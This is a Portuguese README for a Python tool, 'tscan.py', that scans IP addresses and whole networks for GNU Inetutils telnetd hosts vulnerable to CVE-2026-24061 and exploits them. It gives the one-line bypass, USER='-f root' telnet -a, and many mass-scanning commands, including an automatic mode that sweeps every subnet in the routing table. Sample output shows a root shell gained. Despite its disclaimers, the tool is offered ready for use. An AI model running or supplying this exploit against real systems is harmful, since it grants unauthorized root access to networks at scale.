
Scanner baseado em Python que deteta e explora a bypass de autenticação telnetd CVE-2026-24061, permitindo acesso a uma shell root em serviços GNU Inetutils vulneráveis.
Um scanner baseado em Python para detectar e explorar a vulnerabilidade CVE-2026-24061 em serviços telnetd do GNU Inetutils. Esta ferramenta verifica endereços IP ou redes em busca de serviços telnetd vulneráveis que permitem bypass de autenticação, resultando em acesso root ao shell.
ESTE SOFTWARE É FORNECIDO APENAS PARA FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS.
Esta aplicação foi desenvolvida exclusivamente para fins educacionais para demonstrar vulnerabilidades de segurança e auxiliar em testes de segurança e pesquisas autorizados.
ESTE SOFTWARE É FORNECIDO "NO ESTADO EM QUE SE ENCONTRA", SEM GARANTIA DE QUALQUER TIPO, EXPRESSA OU IMPLÍCITA, INCLUINDO, MAS NÃO SE LIMITANDO A, GARANTIAS DE COMERCIABILIDADE, ADEQUAÇÃO A UM FIM ESPECÍFICO E NÃO VIOLAÇÃO. OS AUTORES E COLABORADORES NÃO GARANTEM QUE O SOFTWARE SERÁ LIVRE DE ERROS, SEGURO OU FUNCIONAL. O software pode conter bugs, erros ou outros defeitos.
TODA A RESPONSABILIDADE E OBRIGAÇÃO PELO USO DESTE SOFTWARE RECAI INTEGRALMENTE SOBRE O USUÁRIO. Os autores, colaboradores e distribuidores deste software não serão responsabilizados por quaisquer danos, perdas ou consequências legais resultantes do uso, uso indevido ou incapacidade de usar este software.
Esta ferramenta deve ser usada SOMENTE em sistemas que você possui ou para os quais possui permissão explícita por escrito para testar. O acesso não autorizado a sistemas de computador é ilegal e pode resultar em processo criminal.
Os autores NÃO garantem:
Ao usar este software, você reconhece que leu, entendeu e concorda em ficar vinculado a estes termos. Se você não concorda, não use este software.
Desenvolvido por: Cuma KURT
E-mail: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061: O telnetd do GNU Inetutils até a versão 2.7 permite bypass de autenticação remota por meio de um valor -f root para a variável de ambiente USER.
Pontuação CVSS: 9.8 (Crítica)
Referência: NVD CVE-2026-24061
telnet (geralmente pré-instalado em Linux/macOS)pip3 install -r requirements.txt
Nota: A maioria das dependências faz parte da biblioteca padrão do Python. A ferramenta funciona imediatamente com Python 3.6+.
# Verificar um único endereço IP
python3 tscan.py 192.168.1.1
# Verificar uma rede CIDR
python3 tscan.py 192.168.1.0/24
# Verificar com porta personalizada
python3 tscan.py -p 2323 192.168.1.1
# Verificar alvos de um arquivo
python3 tscan.py targets.txt
# Verificar múltiplos endereços IP
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# Verificar múltiplas redes CIDR
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# Aumentar o número de threads para varredura mais rápida (100 threads)
python3 tscan.py -t 100 192.168.1.0/24
# Aumentar o timeout para redes lentas
python3 tscan.py --timeout 10 192.168.1.0/24
# Combinar ambos para varreduras de redes grandes
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# Detectar e verificar automaticamente todas as sub-redes da tabela de roteamento do sistema
python3 tscan.py --auto
# ou use a forma abreviada:
python3 tscan.py -a
# Detecção automática com porta personalizada
python3 tscan.py --auto -p 2323
# ou:
python3 tscan.py -a -p 2323
# Detecção automática com alto número de threads
python3 tscan.py --auto -t 200
# ou:
python3 tscan.py -a -t 200
Nota: O modo --auto lê a tabela de roteamento do sistema usando o comando ip route list ou route -n e verifica automaticamente todas as sub-redes detectadas.
# Exemplo 1: Varredura rápida da rede local
python3 tscan.py 192.168.1.0/24
# Exemplo 2: Varredura rápida com alta concorrência
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# Exemplo 3: Verificar porta telnet não padrão
python3 tscan.py -p 2323 192.168.1.0/24
# Exemplo 4: Detectar e verificar automaticamente todas as sub-redes da rede local
python3 tscan.py --auto
# ou:
python3 tscan.py -a
# Exemplo 5: Detecção automática com configurações personalizadas
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# ou:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
argumentos posicionais:
targets Endereço(s) IP, rede(s) CIDR ou caminho(s) de arquivo(s) contendo alvos
opções:
-h, --help Mostra esta mensagem de ajuda e sai
-p, --port PORT Porta telnet para verificar (padrão: 23)
-t, --threads THREADS Número de threads concorrentes (padrão: 50)
--timeout TIMEOUT Timeout de conexão em segundos (padrão: 5)
-v, --verbose Saída detalhada
-a, --auto Detecta e verifica automaticamente todas as sub-redes da tabela de roteamento do sistema (route -n ou ip route list)
Crie um arquivo de texto com um alvo por linha:
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
Linhas que começam com # são tratadas como comentários e ignoradas.
A ferramenta fornece:
Progresso em Tempo Real: Mostra os resultados à medida que são descobertos
[!] - Host vulnerável[~] - Porta aberta, mas não vulnerávelRelatório Resumido: Inclui:
[*] Iniciando varredura em 256 alvo(s)...
[*] Porta: 23, Threads: 50, Timeout: 5s
[*] Progresso: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Abertas: 2 | Vulneráveis: 1
[!] 192.168.1.100:23 - VULNERÁVEL
[*] Progresso: [████████████████████████████████████] 100.0% (256/256) | Abertas: 3 | Vulneráveis: 1
[+] Varredura concluída: 256/256 alvos verificados
======================================================================
Resumo dos Resultados da Varredura
======================================================================
Serviços telnet encontrados: 3
Hosts vulneráveis: 1
[!] HOSTS VULNERÁVEIS:
● 192.168.1.100:23
Saída: uid=0(root) gid=0(root) groups=0(root)...
[~] Serviços telnet encontrados, mas não vulneráveis:
● 192.168.1.101:23
● 192.168.1.102:23
[*] Varredura concluída em 12.34 segundos
USER="-f root"telnet -aA vulnerabilidade permite bypass de autenticação definindo a variável de ambiente USER como -f root:
USER="-f root" telnet -a IP_ALVO [PORTA]
Isso faz com que o telnetd interprete a variável USER como uma flag, ignorando a autenticação e concedendo acesso root.
telnet instaladoip route list ou route -nInstale o cliente telnet:
# Debian/Ubuntu
sudo apt-get install telnet
# CentOS/RHEL
sudo yum install telnet
# macOS
# Geralmente pré-instalado
--timeout 10Esta ferramenta destina-se a:
NÃO use esta ferramenta para:
Este programa é software livre: você pode redistribuí-lo e/ou modificá-lo sob os termos da Licença Pública Geral GNU conforme publicada pela Free Software Foundation, seja a versão 3 da Licença, ou (a seu critério) qualquer versão posterior.
Este programa é distribuído na esperança de que seja útil, mas SEM NENHUMA GARANTIA; sem sequer a garantia implícita de COMERCIABILIDADE ou ADEQUAÇÃO A UM DETERMINADO FIM. Consulte a Licença Pública Geral GNU para mais detalhes.
Você deve ter recebido uma cópia da Licença Pública Geral GNU junto com este programa. Se não, veja https://www.gnu.org/licenses/.
Consulte o arquivo LICENSE para o texto completo da Licença Pública Geral GNU v3.0.
OS AUTORES E COLABORADORES NÃO SÃO RESPONSÁVEIS POR QUALQUER USO INDEVIDO OU DANO CAUSADO POR ESTA FERRAMENTA.
Esta ferramenta é fornecida APENAS PARA FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS.
USE POR SUA CONTA E RISCO. Toda a responsabilidade e obrigação pelo uso deste software recai integralmente sobre o usuário. Os autores não garantem a precisão, segurança ou funcionalidade deste software. O software é fornecido "NO ESTADO EM QUE SE ENCONTRA", sem qualquer garantia de qualquer tipo.
Esta aplicação foi desenvolvida exclusivamente para fins educacionais. Ao usar este software, você reconhece que:
Se você não concorda com estes termos, NÃO USE ESTE SOFTWARE.